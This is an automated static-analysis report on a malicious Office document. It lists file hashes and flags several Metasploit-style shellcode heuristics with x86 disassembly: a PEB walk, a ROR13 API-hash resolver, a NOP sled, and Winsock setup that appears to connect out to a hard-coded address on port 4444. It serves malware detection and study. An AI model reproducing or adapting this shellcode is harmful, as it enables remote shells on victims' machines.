Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 025779a5d66a7d31…

MALICIOUS

Office (OLE)

Size: 19.1 KB · First seen: 2012-09-15
MD5: 22917938d55ba421639e4c6ba24d1cb3 SHA-1: 091e3a577ea3105273f2e7a740cb97ccff466124 SHA-256: 025779a5d66a7d31767a00220c964bbcf0c30bfb6b6de0cff41c3cdfa57bbe8b
Risk score: 200

Heuristics 5

  • Metasploit bind_tcp shellcode critical SC_MSF_BIND
    Metasploit bind_tcp shellcode
    Disassembly
    x86 disassembly · validity: code (0.969) — 9/9 branch targets land on an instruction boundary (100% coherence)
    00000637  fc                cld
    00000638  e889000000        call 0x6c6
    0000063D  60                pushal
    0000063E  89e5              mov ebp, esp
    00000640  31d2              xor edx, edx
    00000642  648b5230          mov edx, dword ptr fs:[edx + 0x30]
    00000646  8b520c            mov edx, dword ptr [edx + 0xc]
    00000649  8b5214            mov edx, dword ptr [edx + 0x14]
    0000064C  8b7228            mov esi, dword ptr [edx + 0x28]
    0000064F  0fb74a26          movzx ecx, word ptr [edx + 0x26]
    00000653  31ff              xor edi, edi
    00000655  31c0              xor eax, eax
    00000657  ac                lodsb al, byte ptr [esi]
    00000658  3c61              cmp al, 0x61
    0000065A  7c02              jl 0x65e
    0000065C  2c20              sub al, 0x20
    0000065E  c1cf0d            ror edi, 0xd
    00000661  01c7              add edi, eax
    00000663  e2f0              loop 0x655
    00000665  52                push edx
    00000666  57                push edi
    00000667  8b5210            mov edx, dword ptr [edx + 0x10]
    0000066A  8b423c            mov eax, dword ptr [edx + 0x3c]
    0000066D  01d0              add eax, edx
    0000066F  8b4078            mov eax, dword ptr [eax + 0x78]
    00000672  85c0              test eax, eax
    00000674  744a              je 0x6c0
    00000676  01d0              add eax, edx
    00000678  50                push eax
    00000679  8b4818            mov ecx, dword ptr [eax + 0x18]
    0000067C  8b5820            mov ebx, dword ptr [eax + 0x20]
    0000067F  01d3              add ebx, edx
    00000681  e33c              jecxz 0x6bf
    00000683  49                dec ecx
    00000684  8b348b            mov esi, dword ptr [ebx + ecx*4]
    00000687  01d6              add esi, edx
    00000689  31ff              xor edi, edi
    0000068B  31c0              xor eax, eax
    0000068D  ac                lodsb al, byte ptr [esi]
    0000068E  c1cf0d            ror edi, 0xd
    00000691  01c7              add edi, eax
    00000693  38e0              cmp al, ah
    00000695  75f4              jne 0x68b
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly hidden — these bytes score as degenerate rather than coherent x86 code: a single mnemonic ('inc') accounts for 78% of the decoded instructions, which indicates a sled or padding/filler run rather than program logic.
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (1.0) — 8/8 branch targets land on an instruction boundary (100% coherence)
    00000642  648b5230          mov edx, dword ptr fs:[edx + 0x30]
    00000646  8b520c            mov edx, dword ptr [edx + 0xc]
    00000649  8b5214            mov edx, dword ptr [edx + 0x14]
    0000064C  8b7228            mov esi, dword ptr [edx + 0x28]
    0000064F  0fb74a26          movzx ecx, word ptr [edx + 0x26]
    00000653  31ff              xor edi, edi
    00000655  31c0              xor eax, eax
    00000657  ac                lodsb al, byte ptr [esi]
    00000658  3c61              cmp al, 0x61
    0000065A  7c02              jl 0x65e
    0000065C  2c20              sub al, 0x20
    0000065E  c1cf0d            ror edi, 0xd
    00000661  01c7              add edi, eax
    00000663  e2f0              loop 0x655
    00000665  52                push edx
    00000666  57                push edi
    00000667  8b5210            mov edx, dword ptr [edx + 0x10]
    0000066A  8b423c            mov eax, dword ptr [edx + 0x3c]
    0000066D  01d0              add eax, edx
    0000066F  8b4078            mov eax, dword ptr [eax + 0x78]
    00000672  85c0              test eax, eax
    00000674  744a              je 0x6c0
    00000676  01d0              add eax, edx
    00000678  50                push eax
    00000679  8b4818            mov ecx, dword ptr [eax + 0x18]
    0000067C  8b5820            mov ebx, dword ptr [eax + 0x20]
    0000067F  01d3              add ebx, edx
    00000681  e33c              jecxz 0x6bf
    00000683  49                dec ecx
    00000684  8b348b            mov esi, dword ptr [ebx + ecx*4]
    00000687  01d6              add esi, edx
    00000689  31ff              xor edi, edi
    0000068B  31c0              xor eax, eax
    0000068D  ac                lodsb al, byte ptr [esi]
    0000068E  c1cf0d            ror edi, 0xd
    00000691  01c7              add edi, eax
    00000693  38e0              cmp al, ah
    00000695  75f4              jne 0x68b
    00000697  037df8            add edi, dword ptr [ebp - 8]
    0000069A  3b7d24            cmp edi, dword ptr [ebp + 0x24]
    0000069D  75e2              jne 0x681
    0000069F  58                pop eax
    000006A0  8b                .byte 0x8b
    000006A1  58                pop eax
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB walk followed by ROR13-style API hashing — the import resolver commonly used by position-independent shellcode to locate Windows API functions without an import table
    Disassembly
    x86 disassembly · validity: code (1.0) — 8/8 branch targets land on an instruction boundary (100% coherence)
    00000642  648b5230          mov edx, dword ptr fs:[edx + 0x30]
    00000646  8b520c            mov edx, dword ptr [edx + 0xc]
    00000649  8b5214            mov edx, dword ptr [edx + 0x14]
    0000064C  8b7228            mov esi, dword ptr [edx + 0x28]
    0000064F  0fb74a26          movzx ecx, word ptr [edx + 0x26]
    00000653  31ff              xor edi, edi
    00000655  31c0              xor eax, eax
    00000657  ac                lodsb al, byte ptr [esi]
    00000658  3c61              cmp al, 0x61
    0000065A  7c02              jl 0x65e
    0000065C  2c20              sub al, 0x20
    0000065E  c1cf0d            ror edi, 0xd
    00000661  01c7              add edi, eax
    00000663  e2f0              loop 0x655
    00000665  52                push edx
    00000666  57                push edi
    00000667  8b5210            mov edx, dword ptr [edx + 0x10]
    0000066A  8b423c            mov eax, dword ptr [edx + 0x3c]
    0000066D  01d0              add eax, edx
    0000066F  8b4078            mov eax, dword ptr [eax + 0x78]
    00000672  85c0              test eax, eax
    00000674  744a              je 0x6c0
    00000676  01d0              add eax, edx
    00000678  50                push eax
    00000679  8b4818            mov ecx, dword ptr [eax + 0x18]
    0000067C  8b5820            mov ebx, dword ptr [eax + 0x20]
    0000067F  01d3              add ebx, edx
    00000681  e33c              jecxz 0x6bf
    00000683  49                dec ecx
    00000684  8b348b            mov esi, dword ptr [ebx + ecx*4]
    00000687  01d6              add esi, edx
    00000689  31ff              xor edi, edi
    0000068B  31c0              xor eax, eax
    0000068D  ac                lodsb al, byte ptr [esi]
    0000068E  c1cf0d            ror edi, 0xd
    00000691  01c7              add edi, eax
    00000693  38e0              cmp al, ah
    00000695  75f4              jne 0x68b
    00000697  037df8            add edi, dword ptr [ebp - 8]
    0000069A  3b7d24            cmp edi, dword ptr [ebp + 0x24]
    0000069D  75e2              jne 0x681
    0000069F  58                pop eax
    000006A0  8b                .byte 0x8b
    000006A1  58                pop eax
  • x86 push-string-call medium SC_PUSH_STRING
    Shellcode-style PUSH imm32 sequence builds an execution, network, or Windows API string on the stack; here the first two pushes (0x3233, then 0x5f327377) lay down the little-endian bytes of "ws2_32", the Winsock library name, and the following PUSH ESP passes its address as an argument.
    Disassembly
    x86 disassembly · validity: code (0.923) — 6/6 branch targets land on an instruction boundary (100% coherence)
    000006C7  6833320000        push 0x3233
    000006CC  687773325f        push 0x5f327377
    000006D1  54                push esp
    000006D2  684c772607        push 0x726774c
    000006D7  ffd5              call ebp
    000006D9  b890010000        mov eax, 0x190
    000006DE  29c4              sub esp, eax
    000006E0  54                push esp
    000006E1  50                push eax
    000006E2  6829806b00        push 0x6b8029
    000006E7  ffd5              call ebp
    000006E9  50                push eax
    000006EA  50                push eax
    000006EB  50                push eax
    000006EC  50                push eax
    000006ED  40                inc eax
    000006EE  50                push eax
    000006EF  40                inc eax
    000006F0  50                push eax
    000006F1  68ea0fdfe0        push 0xe0df0fea
    000006F6  ffd5              call ebp
    000006F8  97                xchg edi, eax
    000006F9  6a05              push 5
    000006FB  680a5a8156        push 0x56815a0a
    00000700  680200115c        push 0x5c110002
    00000705  89e6              mov esi, esp
    00000707  6a10              push 0x10
    00000709  56                push esi
    0000070A  57                push edi
    0000070B  6899a57461        push 0x6174a599
    00000710  ffd5              call ebp
    00000712  85c0              test eax, eax
    00000714  740c              je 0x722
    00000716  ff4e08            dec dword ptr [esi + 8]
    00000719  75ec              jne 0x707
    0000071B  68f0b5a256        push 0x56a2b5f0
    00000720  ffd5              call ebp
    00000722  6a00              push 0
    00000724  6a04              push 4
    00000726  56                push esi